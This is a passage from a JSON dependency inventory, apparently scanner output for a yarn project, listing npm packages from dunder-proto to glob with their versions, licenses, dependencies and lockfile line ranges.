}, { "ID": "dunder-proto@1.0.1", "Name": "dunder-proto", "Identifier": { "PURL": "pkg:npm/dunder-proto@1.0.1", "UID": "a08b215bde4b1f9c" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 4683, "EndLine": 4690 } ], "AnalyzedBy": "yarn" }, { "ID": "eastasianwidth@0.2.0", "Name": "eastasianwidth", "Identifier": { "PURL": "pkg:npm/eastasianwidth@0.2.0", "UID": "f7a9c7a4ccccc8a" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4692, "EndLine": 4695 } ], "AnalyzedBy": "yarn" }, { "ID": "ee-first@1.1.1", "Name": "ee-first", "Identifier": { "PURL": "pkg:npm/ee-first@1.1.1", "UID": "4a5a1bd050c93e83" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4697, "EndLine": 4700 } ], "AnalyzedBy": "yarn" }, { "ID": "electron-to-chromium@1.5.233", "Name": "electron-to-chromium", "Identifier": { "PURL": "pkg:npm/electron-to-chromium@1.5.233", "UID": "cb51b457747c0dd6" }, "Version": "1.5.233", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4702, "EndLine": 4705 } ], "AnalyzedBy": "yarn" }, { "ID": "emoji-regex@8.0.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@8.0.0", "UID": "2b6c79e63e318c8" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4712, "EndLine": 4715 } ], "AnalyzedBy": "yarn" }, { "ID": "emoji-regex@9.2.2", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@9.2.2", "UID": "be3639790141f0" }, "Version": "9.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4717, "EndLine": 4720 } ], "AnalyzedBy": "yarn" }, { "ID": "encodeurl@1.0.2", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@1.0.2", "UID": "772129cdfea0f26f" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4722, "EndLine": 4725 } ], "AnalyzedBy": "yarn" }, { "ID": "encodeurl@2.0.0", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@2.0.0", "UID": "7b0b982e07be43b2" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4727, "EndLine": 4730 } ], "AnalyzedBy": "yarn" }, { "ID": "encoding@0.1.13", "Name": "encoding", "Identifier": { "PURL": "pkg:npm/encoding@0.1.13", "UID": "e5099a99669c1c06" }, "Version": "0.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "iconv-lite@0.6.3" ], "Locations": [ { "StartLine": 4739, "EndLine": 4744 } ], "AnalyzedBy": "yarn" }, { "ID": "end-of-stream@1.4.5", "Name": "end-of-stream", "Identifier": { "PURL": "pkg:npm/end-of-stream@1.4.5", "UID": "2db19997adec899c" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0" ], "Locations": [ { "StartLine": 4746, "EndLine": 4751 } ], "AnalyzedBy": "yarn" }, { "ID": "entities@2.0.3", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@2.0.3", "UID": "7748643e62f3cdf" }, "Version": "2.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4758, "EndLine": 4761 } ], "AnalyzedBy": "yarn" }, { "ID": "entities@4.5.0", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@4.5.0", "UID": "a61c47e18d4a47b7" }, "Version": "4.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4753, "EndLine": 4756 } ], "AnalyzedBy": "yarn" }, { "ID": "env-paths@2.2.1", "Name": "env-paths", "Identifier": { "PURL": "pkg:npm/env-paths@2.2.1", "UID": "dc16b6c0dfd64ffb" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4763, "EndLine": 4766 } ], "AnalyzedBy": "yarn" }, { "ID": "err-code@2.0.3", "Name": "err-code", "Identifier": { "PURL": "pkg:npm/err-code@2.0.3", "UID": "810abce0cadd03dd" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4773, "EndLine": 4776 } ], "AnalyzedBy": "yarn" }, { "ID": "error-ex@1.3.4", "Name": "error-ex", "Identifier": { "PURL": "pkg:npm/error-ex@1.3.4", "UID": "3b32fa8f8467dd8a" }, "Version": "1.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.2.1" ], "Locations": [ { "StartLine": 4778, "EndLine": 4783 } ], "AnalyzedBy": "yarn" }, { "ID": "error-stack-parser@2.1.4", "Name": "error-stack-parser", "Identifier": { "PURL": "pkg:npm/error-stack-parser@2.1.4", "UID": "987ac540583fde74" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stackframe@1.3.4" ], "Locations": [ { "StartLine": 4785, "EndLine": 4790 } ], "AnalyzedBy": "yarn" }, { "ID": "es-define-property@1.0.1", "Name": "es-define-property", "Identifier": { "PURL": "pkg:npm/es-define-property@1.0.1", "UID": "d138e7c98101df53" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4860, "EndLine": 4863 } ], "AnalyzedBy": "yarn" }, { "ID": "es-errors@1.3.0", "Name": "es-errors", "Identifier": { "PURL": "pkg:npm/es-errors@1.3.0", "UID": "c9cefd24c66514ea" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4865, "EndLine": 4868 } ], "AnalyzedBy": "yarn" }, { "ID": "es-object-atoms@1.1.1", "Name": "es-object-atoms", "Identifier": { "PURL": "pkg:npm/es-object-atoms@1.1.1", "UID": "7c5399faf8f0f4c5" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0" ], "Locations": [ { "StartLine": 4892, "EndLine": 4897 } ], "AnalyzedBy": "yarn" }, { "ID": "es-set-tostringtag@2.1.0", "Name": "es-set-tostringtag", "Identifier": { "PURL": "pkg:npm/es-set-tostringtag@2.1.0", "UID": "509e56fadd6b1c77" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "get-intrinsic@1.3.0", "has-tostringtag@1.0.2", "hasown@2.0.2" ], "Locations": [ { "StartLine": 4899, "EndLine": 4907 } ], "AnalyzedBy": "yarn" }, { "ID": "escalade@3.2.0", "Name": "escalade", "Identifier": { "PURL": "pkg:npm/escalade@3.2.0", "UID": "96451fc493b1f0b" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4925, "EndLine": 4928 } ], "AnalyzedBy": "yarn" }, { "ID": "escape-html@1.0.3", "Name": "escape-html", "Identifier": { "PURL": "pkg:npm/escape-html@1.0.3", "UID": "aaa55f7323122087" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4930, "EndLine": 4933 } ], "AnalyzedBy": "yarn" }, { "ID": "escape-string-regexp@1.0.5", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@1.0.5", "UID": "44a99e7f6076034e" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4935, "EndLine": 4938 } ], "AnalyzedBy": "yarn" }, { "ID": "escape-string-regexp@2.0.0", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@2.0.0", "UID": "d979833ffdcf0d8b" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4940, "EndLine": 4943 } ], "AnalyzedBy": "yarn" }, { "ID": "escape-string-regexp@4.0.0", "Name": "escape-string-regexp", "Identifier": { "PURL": "pkg:npm/escape-string-regexp@4.0.0", "UID": "de6ab94e13aec8b5" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4945, "EndLine": 4948 } ], "AnalyzedBy": "yarn" }, { "ID": "esprima@4.0.1", "Name": "esprima", "Identifier": { "PURL": "pkg:npm/esprima@4.0.1", "UID": "6cbaaf70e831fd2b" }, "Version": "4.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5108, "EndLine": 5111 } ], "AnalyzedBy": "yarn" }, { "ID": "etag@1.8.1", "Name": "etag", "Identifier": { "PURL": "pkg:npm/etag@1.8.1", "UID": "8318ebe35958b25b" }, "Version": "1.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5142, "EndLine": 5145 } ], "AnalyzedBy": "yarn" }, { "ID": "event-target-shim@5.0.1", "Name": "event-target-shim", "Identifier": { "PURL": "pkg:npm/event-target-shim@5.0.1", "UID": "d5a3c84db17be25d" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5147, "EndLine": 5150 } ], "AnalyzedBy": "yarn" }, { "ID": "events@3.3.0", "Name": "events", "Identifier": { "PURL": "pkg:npm/events@3.3.0", "UID": "f1807c15eff6781a" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5159, "EndLine": 5162 } ], "AnalyzedBy": "yarn" }, { "ID": "events-universal@1.0.1", "Name": "events-universal", "Identifier": { "PURL": "pkg:npm/events-universal@1.0.1", "UID": "a02311b328801828" }, "Version": "1.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-events@2.7.0" ], "Locations": [ { "StartLine": 5152, "EndLine": 5157 } ], "AnalyzedBy": "yarn" }, { "ID": "execa@5.1.1", "Name": "execa", "Identifier": { "PURL": "pkg:npm/execa@5.1.1", "UID": "d1f1fad9f076de6c" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "get-stream@6.0.1", "human-signals@2.1.0", "is-stream@2.0.1", "merge-stream@2.0.0", "npm-run-path@4.0.1", "onetime@5.1.2", "signal-exit@3.0.7", "strip-final-newline@2.0.0" ], "Locations": [ { "StartLine": 5164, "EndLine": 5177 } ], "AnalyzedBy": "yarn" }, { "ID": "expand-template@2.0.3", "Name": "expand-template", "Identifier": { "PURL": "pkg:npm/expand-template@2.0.3", "UID": "8c9c379e99967e27" }, "Version": "2.0.3", "Licenses": [ "(MIT OR WTFPL)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5184, "EndLine": 5187 } ], "AnalyzedBy": "yarn" }, { "ID": "exponential-backoff@3.1.2", "Name": "exponential-backoff", "Identifier": { "PURL": "pkg:npm/exponential-backoff@3.1.2", "UID": "d11a6e4c9edb31e3" }, "Version": "3.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5200, "EndLine": 5203 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-base64-decode@1.0.0", "Name": "fast-base64-decode", "Identifier": { "PURL": "pkg:npm/fast-base64-decode@1.0.0", "UID": "ec7efe176c63fe2c" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5205, "EndLine": 5208 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-deep-equal@3.1.3", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@3.1.3", "UID": "a9f0028942cdefa3" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5210, "EndLine": 5213 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-fifo@1.3.2", "Name": "fast-fifo", "Identifier": { "PURL": "pkg:npm/fast-fifo@1.3.2", "UID": "fe85e3a70b23f6b3" }, "Version": "1.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5215, "EndLine": 5218 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-glob@3.3.3", "Name": "fast-glob", "Identifier": { "PURL": "pkg:npm/fast-glob@3.3.3", "UID": "96cee0805d8f8984" }, "Version": "3.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "@nodelib/fs.walk@1.2.8", "glob-parent@5.1.2", "merge2@1.4.1", "micromatch@4.0.8" ], "Locations": [ { "StartLine": 5220, "EndLine": 5229 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-json-stable-stringify@2.1.0", "Name": "fast-json-stable-stringify", "Identifier": { "PURL": "pkg:npm/fast-json-stable-stringify@2.1.0", "UID": "a5e6b973c9d55db5" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5231, "EndLine": 5234 } ], "AnalyzedBy": "yarn" }, { "ID": "fast-xml-parser@4.5.3", "Name": "fast-xml-parser", "Identifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "590ac80883be18cd" }, "Version": "4.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "strnum@1.1.2" ], "Locations": [ { "StartLine": 5241, "EndLine": 5246 } ], "AnalyzedBy": "yarn" }, { "ID": "fastest-levenshtein@1.0.16", "Name": "fastest-levenshtein", "Identifier": { "PURL": "pkg:npm/fastest-levenshtein@1.0.16", "UID": "c256bdb95cdcf6bc" }, "Version": "1.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5248, "EndLine": 5251 } ], "AnalyzedBy": "yarn" }, { "ID": "fastq@1.19.1", "Name": "fastq", "Identifier": { "PURL": "pkg:npm/fastq@1.19.1", "UID": "c838ecceb09c794f" }, "Version": "1.19.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "reusify@1.1.0" ], "Locations": [ { "StartLine": 5253, "EndLine": 5258 } ], "AnalyzedBy": "yarn" }, { "ID": "faye-websocket@0.11.4", "Name": "faye-websocket", "Identifier": { "PURL": "pkg:npm/faye-websocket@0.11.4", "UID": "619309b5fa44fb60" }, "Version": "0.11.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "websocket-driver@0.7.4" ], "Locations": [ { "StartLine": 5260, "EndLine": 5265 } ], "AnalyzedBy": "yarn" }, { "ID": "fb-watchman@2.0.2", "Name": "fb-watchman", "Identifier": { "PURL": "pkg:npm/fb-watchman@2.0.2", "UID": "c8843132e2e5678a" }, "Version": "2.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bser@2.1.1" ], "Locations": [ { "StartLine": 5267, "EndLine": 5272 } ], "AnalyzedBy": "yarn" }, { "ID": "fbjs@0.8.18", "Name": "fbjs", "Identifier": { "PURL": "pkg:npm/fbjs@0.8.18", "UID": "cd1f2795ee1bcda3" }, "Version": "0.8.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-js@1.2.7", "isomorphic-fetch@2.2.1", "loose-envify@1.4.0", "object-assign@4.1.1", "promise@7.3.1", "setimmediate@1.0.5", "ua-parser-js@0.7.41" ], "Locations": [ { "StartLine": 5274, "EndLine": 5285 } ], "AnalyzedBy": "yarn" }, { "ID": "fdir@6.5.0", "Name": "fdir", "Identifier": { "PURL": "pkg:npm/fdir@6.5.0", "UID": "4179e47e4f7c5da5" }, "Version": "6.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5287, "EndLine": 5288 } ], "AnalyzedBy": "yarn" }, { "ID": "fill-range@7.1.1", "Name": "fill-range", "Identifier": { "PURL": "pkg:npm/fill-range@7.1.1", "UID": "1adb158e41c3c0a0" }, "Version": "7.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "to-regex-range@5.0.1" ], "Locations": [ { "StartLine": 5302, "EndLine": 5307 } ], "AnalyzedBy": "yarn" }, { "ID": "filter-obj@1.1.0", "Name": "filter-obj", "Identifier": { "PURL": "pkg:npm/filter-obj@1.1.0", "UID": "91365b893418d545" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5309, "EndLine": 5312 } ], "AnalyzedBy": "yarn" }, { "ID": "finalhandler@1.1.2", "Name": "finalhandler", "Identifier": { "PURL": "pkg:npm/finalhandler@1.1.2", "UID": "188da835f35cfca5" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "encodeurl@1.0.2", "escape-html@1.0.3", "on-finished@2.3.0", "parseurl@1.3.3", "statuses@1.5.0", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 5314, "EndLine": 5325 } ], "AnalyzedBy": "yarn" }, { "ID": "find-babel-config@2.1.2", "Name": "find-babel-config", "Identifier": { "PURL": "pkg:npm/find-babel-config@2.1.2", "UID": "56920d6726da074a" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "json5@2.2.3" ], "Locations": [ { "StartLine": 5327, "EndLine": 5332 } ], "AnalyzedBy": "yarn" }, { "ID": "find-up@3.0.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@3.0.0", "UID": "a63f9c82b1b2dfd8" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@3.0.0" ], "Locations": [ { "StartLine": 5334, "EndLine": 5339 } ], "AnalyzedBy": "yarn" }, { "ID": "find-up@4.1.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@4.1.0", "UID": "a0a8e5779e81984d" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@5.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 5349, "EndLine": 5355 } ], "AnalyzedBy": "yarn" }, { "ID": "find-up@5.0.0", "Name": "find-up", "Identifier": { "PURL": "pkg:npm/find-up@5.0.0", "UID": "b6b57071d4408c9d" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "locate-path@6.0.0", "path-exists@4.0.0" ], "Locations": [ { "StartLine": 5357, "EndLine": 5363 } ], "AnalyzedBy": "yarn" }, { "ID": "firebase@12.2.1", "Name": "firebase", "Identifier": { "PURL": "pkg:npm/firebase@12.2.1", "UID": "26035587ab3a05d0" }, "Version": "12.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/ai@2.2.1", "@firebase/analytics@0.10.18", "@firebase/analytics-compat@0.2.24", "@firebase/app@0.14.2", "@firebase/app-check@0.11.0", "@firebase/app-check-compat@0.4.0", "@firebase/app-compat@0.5.2", "@firebase/app-types@0.9.3", "@firebase/auth@1.11.0", "@firebase/auth-compat@0.6.0", "@firebase/data-connect@0.3.11", "@firebase/database@1.1.0", "@firebase/database-compat@2.1.0", "@firebase/firestore@4.9.1", "@firebase/firestore-compat@0.4.1", "@firebase/functions@0.13.1", "@firebase/functions-compat@0.4.1", "@firebase/installations@0.6.19", "@firebase/installations-compat@0.2.19", "@firebase/messaging@0.12.23", "@firebase/messaging-compat@0.2.23", "@firebase/performance@0.7.9", "@firebase/performance-compat@0.2.22", "@firebase/remote-config@0.6.6", "@firebase/remote-config-compat@0.2.19", "@firebase/storage@0.14.0", "@firebase/storage-compat@0.4.0", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 5372, "EndLine": 5404 } ], "AnalyzedBy": "yarn" }, { "ID": "flow-enums-runtime@0.0.6", "Name": "flow-enums-runtime", "Identifier": { "PURL": "pkg:npm/flow-enums-runtime@0.0.6", "UID": "490d85c178a89a03" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5420, "EndLine": 5423 } ], "AnalyzedBy": "yarn" }, { "ID": "follow-redirects@1.15.11", "Name": "follow-redirects", "Identifier": { "PURL": "pkg:npm/follow-redirects@1.15.11", "UID": "6524ae70e09c9077" }, "Version": "1.15.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5425, "EndLine": 5428 } ], "AnalyzedBy": "yarn" }, { "ID": "for-each@0.3.5", "Name": "for-each", "Identifier": { "PURL": "pkg:npm/for-each@0.3.5", "UID": "fa2cacb4eb77ba77" }, "Version": "0.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-callable@1.2.7" ], "Locations": [ { "StartLine": 5430, "EndLine": 5435 } ], "AnalyzedBy": "yarn" }, { "ID": "foreground-child@3.3.1", "Name": "foreground-child", "Identifier": { "PURL": "pkg:npm/foreground-child@3.3.1", "UID": "1ccf7634108d4ce9" }, "Version": "3.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cross-spawn@7.0.6", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 5437, "EndLine": 5443 } ], "AnalyzedBy": "yarn" }, { "ID": "form-data@4.0.4", "Name": "form-data", "Identifier": { "PURL": "pkg:npm/form-data@4.0.4", "UID": "73f0e3b5dc2a3f61" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asynckit@0.4.0", "combined-stream@1.0.8", "es-set-tostringtag@2.1.0", "hasown@2.0.2", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 5445, "EndLine": 5454 } ], "AnalyzedBy": "yarn" }, { "ID": "fresh@0.5.2", "Name": "fresh", "Identifier": { "PURL": "pkg:npm/fresh@0.5.2", "UID": "42ed98dc0f0909e6" }, "Version": "0.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5456, "EndLine": 5459 } ], "AnalyzedBy": "yarn" }, { "ID": "fs-constants@1.0.0", "Name": "fs-constants", "Identifier": { "PURL": "pkg:npm/fs-constants@1.0.0", "UID": "57be96fd06323205" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5461, "EndLine": 5464 } ], "AnalyzedBy": "yarn" }, { "ID": "fs-extra@11.3.2", "Name": "fs-extra", "Identifier": { "PURL": "pkg:npm/fs-extra@11.3.2", "UID": "85726961a12c9c9e" }, "Version": "11.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "jsonfile@6.2.0", "universalify@2.0.1" ], "Locations": [ { "StartLine": 5475, "EndLine": 5482 } ], "AnalyzedBy": "yarn" }, { "ID": "fs-extra@7.0.1", "Name": "fs-extra", "Identifier": { "PURL": "pkg:npm/fs-extra@7.0.1", "UID": "abc4202c8249d0bf" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "jsonfile@4.0.0", "universalify@0.1.2" ], "Locations": [ { "StartLine": 5484, "EndLine": 5491 } ], "AnalyzedBy": "yarn" }, { "ID": "fs-minipass@3.0.3", "Name": "fs-minipass", "Identifier": { "PURL": "pkg:npm/fs-minipass@3.0.3", "UID": "3534b157e6b64de6" }, "Version": "3.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 5509, "EndLine": 5514 } ], "AnalyzedBy": "yarn" }, { "ID": "fs.realpath@1.0.0", "Name": "fs.realpath", "Identifier": { "PURL": "pkg:npm/fs.realpath@1.0.0", "UID": "168ccea30b48cec0" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5516, "EndLine": 5519 } ], "AnalyzedBy": "yarn" }, { "ID": "function-bind@1.1.2", "Name": "function-bind", "Identifier": { "PURL": "pkg:npm/function-bind@1.1.2", "UID": "13eaeb5cfe568b7c" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5521, "EndLine": 5524 } ], "AnalyzedBy": "yarn" }, { "ID": "gauge@2.7.4", "Name": "gauge", "Identifier": { "PURL": "pkg:npm/gauge@2.7.4", "UID": "3f27808838b313a" }, "Version": "2.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@1.2.0", "console-control-strings@1.1.0", "has-unicode@2.0.1", "object-assign@4.1.1", "signal-exit@3.0.7", "string-width@1.0.2", "strip-ansi@3.0.1", "wide-align@1.1.5" ], "Locations": [ { "StartLine": 5557, "EndLine": 5569 } ], "AnalyzedBy": "yarn" }, { "ID": "generator-function@2.0.1", "Name": "generator-function", "Identifier": { "PURL": "pkg:npm/generator-function@2.0.1", "UID": "746e7b129e53da85" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5571, "EndLine": 5574 } ], "AnalyzedBy": "yarn" }, { "ID": "gensync@1.0.0-beta.2", "Name": "gensync", "Identifier": { "PURL": "pkg:npm/gensync@1.0.0-beta.2", "UID": "f48fc1368ce52a90" }, "Version": "1.0.0-beta.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5576, "EndLine": 5579 } ], "AnalyzedBy": "yarn" }, { "ID": "get-caller-file@2.0.5", "Name": "get-caller-file", "Identifier": { "PURL": "pkg:npm/get-caller-file@2.0.5", "UID": "5f690116fda1d531" }, "Version": "2.0.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5581, "EndLine": 5584 } ], "AnalyzedBy": "yarn" }, { "ID": "get-intrinsic@1.3.0", "Name": "get-intrinsic", "Identifier": { "PURL": "pkg:npm/get-intrinsic@1.3.0", "UID": "6a52e5a5c5c7df14" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "es-errors@1.3.0", "es-object-atoms@1.1.1", "function-bind@1.1.2", "get-proto@1.0.1", "gopd@1.2.0", "has-symbols@1.1.0", "hasown@2.0.2", "math-intrinsics@1.1.0" ], "Locations": [ { "StartLine": 5586, "EndLine": 5600 } ], "AnalyzedBy": "yarn" }, { "ID": "get-package-type@0.1.0", "Name": "get-package-type", "Identifier": { "PURL": "pkg:npm/get-package-type@0.1.0", "UID": "3eaa9734e63bbda" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5602, "EndLine": 5605 } ], "AnalyzedBy": "yarn" }, { "ID": "get-proto@1.0.1", "Name": "get-proto", "Identifier": { "PURL": "pkg:npm/get-proto@1.0.1", "UID": "d6765cbb92aa2fb4" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dunder-proto@1.0.1", "es-object-atoms@1.1.1" ], "Locations": [ { "StartLine": 5607, "EndLine": 5613 } ], "AnalyzedBy": "yarn" }, { "ID": "get-stream@6.0.1", "Name": "get-stream", "Identifier": { "PURL": "pkg:npm/get-stream@6.0.1", "UID": "ca2ca983c1c56626" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5615, "EndLine": 5618 } ], "AnalyzedBy": "yarn" }, { "ID": "getenv@2.0.0", "Name": "getenv", "Identifier": { "PURL": "pkg:npm/getenv@2.0.0", "UID": "abff5984eabcd8ac" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5629, "EndLine": 5632 } ], "AnalyzedBy": "yarn" }, { "ID": "github-from-package@0.0.0", "Name": "github-from-package", "Identifier": { "PURL": "pkg:npm/github-from-package@0.0.0", "UID": "9066dcfa2d19fc35" }, "Version": "0.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5634, "EndLine": 5637 } ], "AnalyzedBy": "yarn" }, { "ID": "glob@10.4.5", "Name": "glob", "Identifier": { "PURL": 